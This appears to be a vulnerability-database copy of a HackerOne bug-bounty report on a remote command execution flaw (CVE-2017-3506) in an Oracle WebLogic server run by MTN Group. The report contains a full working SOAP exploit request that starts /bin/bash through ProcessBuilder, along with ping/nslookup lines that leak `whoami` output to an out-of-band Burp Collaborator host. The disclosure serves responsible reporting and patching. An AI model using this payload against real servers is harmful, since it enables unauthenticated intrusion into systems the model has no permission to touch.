Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneTounsi_007H1:810778
HistoryMar 04, 2020 - 2:20 p.m.

MTN Group: Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-3506]

2020-03-0414:20:40
tounsi_007
hackerone.com
123

7.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.974 High

EPSS

Percentile

99.8%

JSON

##Summary

Hello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on https://raebilling.mtn.co.za.

##Steps To Reproduce

  • To reproduce, try this request with BurpSuite
  • This request to the https://raebilling.mtn.co.za/wls-wsat/RegistrationRequesterPortType will trigger Remote OS Command Execution:
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: raebilling.mtn.co.za
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Accept-Languag: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
        <void index="2">
                  <string>ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>

==Note:==

  • To reproduce this case with nslookup or ping, fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net host should be replaced by your own Burp Collaborator instance or with your private VPS IP to catch the DNS request

##Example:

ping `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net
nslookup `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net

==POC:== {F736973}

Suggested Mitigation/Remediation Actions

  • Patching WebLogic to the recent version will fix the issue.

Impact

This vulnerability allow an unauthenticated attacker:

  • To perform Remote OS Command Execution

Related

thn 2
nuclei 1
prion 1
trendmicroblog 1
cve 1
talosblog 1
checkpoint_advisories 1
fireeye 1
openvas 1
nessus 1
githubexploit 1
impervablog 1
kitploit 1
oracle 1
thn
thn
8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency
2023-05-18 09:31:00
8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware
2023-12-19 06:58:00
nuclei
nuclei
Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution
2021-04-26 09:48:57
prion
prion
Design/Logic Flaw
2017-04-24 19:59:00
trendmicroblog
trendmicroblog
8220 Gang Evolves With New Strategies
2023-05-16 00:00:00
cve
cve
CVE-2017-3506
2017-04-24 19:59:00
talosblog
talosblog
Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions
2018-01-31 07:58:00
checkpoint_advisories
checkpoint_advisories
Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271; CVE-2017-3506)
2017-12-27 00:00:00
fireeye
fireeye
Click It Up: Targeting Local Government Payment Portals
2018-09-19 10:00:00
openvas
openvas
Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)
2017-04-19 00:00:00
nessus
nessus
Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)
2017-04-21 00:00:00
githubexploit
githubexploit
Exploit for Injection in Oracle Weblogic Server
2019-08-23 01:42:57
impervablog
impervablog
Imperva Detects Undocumented 8220 Gang Activities
2023-12-14 13:48:35
kitploit
kitploit
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2017
2017-04-18 00:00:00

7.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.974 High

EPSS

Percentile

99.8%

JSON
Related for H1:810778
thn2nuclei1prion1trendmicroblog1cve1talosblog1checkpoint_advisories1fireeye1openvas1nessus1githubexploit1impervablog1kitploit1oracle1